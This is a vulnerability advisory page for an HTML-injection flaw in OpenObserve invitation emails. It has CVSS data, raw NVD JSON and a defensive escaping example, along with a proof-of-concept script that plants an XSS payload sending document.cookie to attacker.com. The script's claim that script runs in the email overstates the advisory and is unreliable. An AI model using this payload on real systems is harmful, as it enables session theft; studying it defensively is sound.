Security Vulnerability Report
CVE-2025-64744 CVSS 3.5 LOW

CVE-2025-64744

Published: 2025-11-13 21:15:54
Last Modified: 2026-04-15 00:35:42

Description

OpenObserve is a cloud-native observability platform. In versions up to and including 0.16.1, when creating or renaming an organization with HTML in the name, the markup is rendered inside the invitation email. This indicates that user-controlled input is inserted into the email template without proper HTML escaping. As of time of publication, no patched versions are available.
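The escaping gap the description refers to, shown as an added example that is not OpenObserve's own code: a minimal invitation-email template rendered once with the organization name substituted verbatim (the vulnerable pattern) and once with the value HTML-escaped before substitution (the fix). The template text, function names and the sample organization name are assumptions constructed for illustration; the standard-library `html.escape` is used as the escaping primitive, and a small audit helper flags stored names that already contain markup.

```python
"""Added example for CVE-2025-64744 (not OpenObserve's code): HTML injection
through an unescaped template value, and the escaped counterpart.

The template string, function names and sample organization name below are
assumptions constructed for illustration only.
"""
import html
from string import Template

# Assumed shape of an invitation e-mail template; the real OpenObserve
# template is not reproduced here.
INVITE_TEMPLATE = Template(
    "<p>You have been invited to join <b>$org_name</b> on OpenObserve.</p>"
)


def render_invite_unescaped(org_name: str) -> str:
    """Vulnerable pattern: the user-controlled name is substituted verbatim,
    so any markup inside it becomes live HTML in the e-mail body."""
    return INVITE_TEMPLATE.substitute(org_name=org_name)


def render_invite_escaped(org_name: str) -> str:
    """Hardened pattern: escape the value for an HTML text context first.
    quote=True also encodes " and ' so the value is safe inside attributes."""
    return INVITE_TEMPLATE.substitute(org_name=html.escape(org_name, quote=True))


def contains_markup(value: str) -> bool:
    """Audit helper: does a stored organization name contain any HTML
    metacharacter? Useful for scanning existing records after an upgrade
    or as an input-validation gate at creation/rename time."""
    return any(ch in value for ch in "<>\"'&")


# Constructed sample resembling the "HTML in the name" case from the advisory.
SAMPLE_NAME = 'acme<img src=x onerror="alert(1)">'

if __name__ == "__main__":
    print(render_invite_unescaped(SAMPLE_NAME))  # markup survives into the body
    print(render_invite_escaped(SAMPLE_NAME))    # markup rendered as literal text
    print(contains_markup(SAMPLE_NAME), contains_markup("acme-prod"))
```

Escaping at the point of rendering, not at storage, is the durable fix: a name that is escaped only on input would still be rendered raw by any other template that reads the same field. The audit helper is deliberately conservative (it flags `&` as well as angle brackets) because the value may be interpolated into attribute or text contexts the template author did not anticipate.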

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

OpenObserve <= 0.16.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-64744 PoC - OpenObserve Organization Name XSS
# This PoC demonstrates the Stored XSS vulnerability in OpenObserve organization names

import requests
import json
import sys

# Configuration
TARGET_URL = "http://target-openobserve-server:5080"  # Replace with actual target
USERNAME = "[email protected]"
PASSWORD = "attacker_password"

# Malicious payload - XSS in organization name
XSS_PAYLOAD = '''<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">'''


def login():
    """Authenticate and get session token"""
    login_url = f"{TARGET_URL}/api/auth/login"
    data = {
        "email": USERNAME,
        "password": PASSWORD
    }
    try:
        response = requests.post(login_url, json=data, timeout=10)
        if response.status_code == 200:
            token = response.json().get("data", {}).get("token")
            return token
        else:
            print(f"[-] Login failed: {response.status_code}")
            return None
    except Exception as e:
        print(f"[-] Login error: {e}")
        return None


def create_malicious_org(token):
    """Create organization with XSS payload in name"""
    create_org_url = f"{TARGET_URL}/api/organizations"
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    payload = {
        "name": XSS_PAYLOAD,
        "description": "Malicious organization"
    }
    try:
        response = requests.post(create_org_url, json=payload, headers=headers, timeout=10)
        if response.status_code in [200, 201]:
            print("[+] Malicious organization created successfully!")
            print(f"[+] Payload: {XSS_PAYLOAD}")
            return True
        else:
            print(f"[-] Organization creation failed: {response.status_code}")
            print(f"[-] Response: {response.text}")
            return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False


def main():
    print("=" * 60)
    print("CVE-2025-64744 PoC - OpenObserve XSS via Organization Name")
    print("=" * 60)

    # Step 1: Login
    print("\n[Step 1] Authenticating...")
    token = login()
    if not token:
        sys.exit(1)
    print("[+] Authentication successful")

    # Step 2: Create malicious organization
    print("\n[Step 2] Creating organization with XSS payload...")
    if create_malicious_org(token):
        print("[+] XSS payload injected into organization name")
        print("[+] When admin sends invitation email, XSS will trigger")
    else:
        print("[-] Failed to inject payload")
        sys.exit(1)


if __name__ == "__main__":
    main()
```

References

https://github.com/openobserve/openobserve/security/advisories/GHSA-3jpx-57gj-w458

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-64744",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-13T21:15:54.073",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "OpenObserve is a cloud-native observability platform. In versions up to and including 0.16.1, when creating or renaming an organization with HTML in the name, the markup is rendered inside the invitation email. This indicates that user-controlled input is inserted into the email template without proper HTML escaping. As of time of publication, no patched versions are available."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.1,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/openobserve/openobserve/security/advisories/GHSA-3jpx-57gj-w458",
        "source": "[email protected]"
      }
    ]
  }
}
```